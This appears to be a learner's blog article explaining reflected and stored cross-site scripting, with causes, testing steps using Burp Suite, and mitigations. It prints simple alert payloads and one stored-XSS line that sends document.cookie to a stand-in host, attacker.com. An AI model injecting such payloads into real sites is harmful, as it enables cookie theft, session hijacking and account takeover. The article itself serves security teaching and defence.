Introduction

Cross-Site Scripting (XSS) remains one of the most prevalent vulnerabilities in modern web applications. Despite being well-documented, it continues to appear in production systems due to improper input handling and weak output encoding practices.

During my recent hands-on learning in web application security, I explored how XSS vulnerabilities can be identified and analyzed in practical scenarios. This article focuses on two major types of XSS — Reflected and Stored — along with their causes, exploitation techniques, and mitigation strategies.

What is Cross-Site Scripting (XSS)?

Cross-Site Scripting occurs when an application includes untrusted data in its response without proper validation or encoding, allowing execution of malicious JavaScript in the user's browser.

Basic Example

<script>alert('XSS')</script>

If this payload executes within a web application, it indicates a potential XSS vulnerability.

Types of XSS

1. Reflected XSS

Reflected XSS occurs when user input is immediately returned ("reflected") in the server's response without proper sanitization.

How it Works

  • The attacker crafts a malicious URL containing a script payload
  • The victim clicks the link
  • The server reflects the input in the response
  • The browser executes the script

Example

https://example.com/search?q=<script>alert(1)</script>

Characteristics

  • Non-persistent (not stored on the server)
  • Requires user interaction
  • Common in search fields, error messages, and redirects

2. Stored XSS

Stored XSS (Persistent XSS) occurs when malicious input is stored on the server and later served to users.

How it Works

  • The attacker injects a payload into an input field (e.g., comment box)
  • The application stores the payload in a database
  • When users access the data, the script executes

Example

<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>

Characteristics

  • Persistent (stored in backend systems)
  • Affects multiple users
  • Higher impact than reflected XSS

Root Causes

XSS vulnerabilities typically arise due to:

  • Lack of input validation
  • Improper output encoding
  • Rendering user input directly in HTML/JavaScript contexts
  • Failure to sanitize special characters

Exploitation Techniques

Step 1: Identify Input Points

  • Forms (login, comments, search)
  • URL parameters
  • Headers and cookies

Step 2: Inject Payloads

<script>alert(1)</script>

Step 3: Observe Behavior

  • Check if the payload executes
  • Inspect DOM and server responses

Step 4: Use Testing Tools

Leverage tools like Burp Suite to intercept and modify requests.

Impact of XSS

Successful XSS attacks can lead to:

  • Session hijacking
  • Account takeover
  • Web page defacement
  • Phishing attacks
  • Execution of unauthorized actions

Stored XSS, in particular, can impact multiple users and is often considered high or critical severity.

Mitigation Strategies

1. Input Validation

Validate and sanitize all user inputs.

2. Output Encoding

Encode user data before rendering in HTML, JavaScript, or URL contexts.

3. Use Security Headers

  • Content Security Policy (CSP)
  • X-XSS-Protection

4. Avoid Inline JavaScript

Minimize the risk of script injection.

5. Use Secure Frameworks

Leverage built-in protections like automatic escaping.

Practical Insight

During testing, I observed that even simple input fields such as search boxes and comment sections can become entry points for XSS if validation is not properly implemented.

Using Burp Suite, I was able to intercept requests and test payload injections, which helped me understand how applications handle user-supplied data.

One challenge I faced was identifying why certain payloads were not executing, which led me to explore different injection contexts such as HTML and JavaScript.

Conclusion

Cross-Site Scripting continues to be a major threat due to its simplicity and effectiveness. While Reflected XSS relies on user interaction, Stored XSS can silently impact a large user base.

Organizations must prioritize secure coding practices, proper validation, and output encoding to mitigate these risks.

For security professionals and learners, mastering XSS detection through both theory and hands-on testing is essential for identifying real-world vulnerabilities and improving application security.